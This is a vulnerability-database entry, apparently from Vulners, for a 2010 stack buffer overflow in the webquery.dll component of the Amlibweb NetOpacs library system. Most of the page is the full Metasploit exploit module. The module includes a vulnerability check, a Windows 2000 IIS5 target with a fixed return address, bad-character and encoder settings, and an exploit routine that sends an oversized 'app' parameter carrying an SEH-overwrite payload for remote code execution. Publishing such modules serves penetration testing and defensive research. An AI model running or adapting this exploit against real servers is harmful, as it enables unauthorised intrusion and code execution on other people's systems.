Amlibweb NetOpacs webquery.dll Stack Buffer Overflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Amlibweb NetOpacs webquery.dll Stack Buffer Overflow in Amlib's Amlibweb Library Management System (NetOpacs) allows for arbitrary remote code execution by exploiting a stack buffer overflow in the webquery.dll API through IIS requests


                                                ##
# $Id: amlibweb_webquerydll_app.rb 11039 2010-11-14 19:03:24Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require &#39;msf/core&#39;


class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;         =&#62; &#39;Amlibweb NetOpacs webquery.dll Stack Buffer Overflow&#39;,
			&#39;Description&#39;  =&#62; %q{
					This module exploits a stack buffer overflow in Amlib&#39;s Amlibweb
				Library Management System (NetOpacs). The webquery.dll
				API is available through IIS requests. By specifying
				an overly long string to the &#39;app&#39; parameter, SeH can be
				reliably overwritten allowing for arbitrary remote code execution.
				In addition, it is possible to overwrite EIP by specifying
				an arbitrary parameter name with an &#39;=&#39; terminator.
			},
			&#39;Author&#39;       =&#62; [ &#39;patrick&#39; ],
			&#39;Arch&#39;         =&#62; [ ARCH_X86 ],
			&#39;License&#39;      =&#62; MSF_LICENSE,
			&#39;Version&#39;      =&#62; &#39;$Revision: 11039 $&#39;,
			&#39;References&#39;   =&#62;
				[
					[ &#39;OSVDB&#39;, &#39;66814&#39;],
					[ &#39;URL&#39;, &#39;http://www.aushack.com/advisories/&#39; ],
				],
			&#39;Privileged&#39;		=&#62; true,
			&#39;DefaultOptions&#39;	=&#62;
				{
					&#39;EXITFUNC&#39;	=&#62; &#39;thread&#39;,
				},
			&#39;Payload&#39;		=&#62;
				{
					&#39;Space&#39;			=&#62; 600,
					&#39;BadChars&#39; 		=&#62; &#34;\x00\x0a\x0d\x20%=?\x2f\x5c\x3a\x3d\@;!$&#34;,
					&#39;EncoderType&#39;		=&#62; Msf::Encoder::Type::AlphanumMixed,
					&#39;DisableNops&#39;  		=&#62;  &#39;True&#39;,
					&#39;StackAdjustment&#39; 	=&#62; -3500,
				},
			&#39;Platform&#39; =&#62; [&#39;win&#39;],
			&#39;Targets&#39;  =&#62;
				[
					# patrickw - Tested OK 20100803 w2k IIS5
					[ &#39;Windows 2000 Pro All - English&#39;, { &#39;Ret&#39; =&#62; 0x75022ac4 } ], # p/p/r ws2help.dll - &#39;dll?app={buff}&#39; for SeH IIS5
					# [ &#39;Windows 2003 Server All - English&#39;, { &#39;Ret&#39; =&#62; 0x44434241 } ], # todo: &#39;dll?{buff}=&#39; call edi for EIP in IIS6 w3wp.exe, 120 byte limit, ASCII only.
				],
			&#39;DisclosureDate&#39; =&#62; &#39;Aug 03 2010&#39;, #0day
			&#39;DefaultTarget&#39; =&#62; 0))

		register_options(
			[
				Opt::RPORT(80),
			],self.class)
	end

	def check
		connect

		rand = Rex::Text.rand_text_alpha(10)

		sock.put(&#34;GET /amlibweb/webquery.dll?#{rand}= HTTP/1.0\r\n\r\n&#34;)
		res = sock.get(-1,3)
		disconnect

		if (res =~ /&#60;H1&#62;BAD REQUEST&#60;\/H1&#62;&#60;P&#62;Your client sent a request that this server didn&#39;t understand.&#60;br&#62;Request:\s(\w+)/)
			if ($1 == rand)
				return Exploit::CheckCode::Vulnerable
			end
		end
		Exploit::CheckCode::Safe
	end

	def exploit
		connect
		seh = generate_seh_payload(target.ret)

		buffer = Rex::Text.rand_text_alphanumeric(3028) + seh
		sploit = &#34;GET /amlibweb/webquery.dll?app=&#34;  + buffer + &#34; HTTP/1.0\r\n&#34;
		sock.put(sploit + &#34;\r\n\r\n&#34;)

		handler
		disconnect
	end
end

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1